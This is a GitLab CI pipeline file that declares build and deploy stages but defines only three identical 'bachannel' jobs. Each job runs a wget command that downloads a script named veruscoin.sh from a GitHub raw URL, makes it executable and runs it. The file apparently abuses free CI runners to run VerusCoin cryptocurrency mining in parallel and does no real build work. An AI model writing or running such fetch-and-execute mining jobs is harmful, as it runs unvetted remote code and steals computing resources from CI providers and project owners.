stages:
  - bachannel
  - build
  - deploy

bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/uixnwiux/verus/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/uixnwiux/verus/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/uixnwiux/verus/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
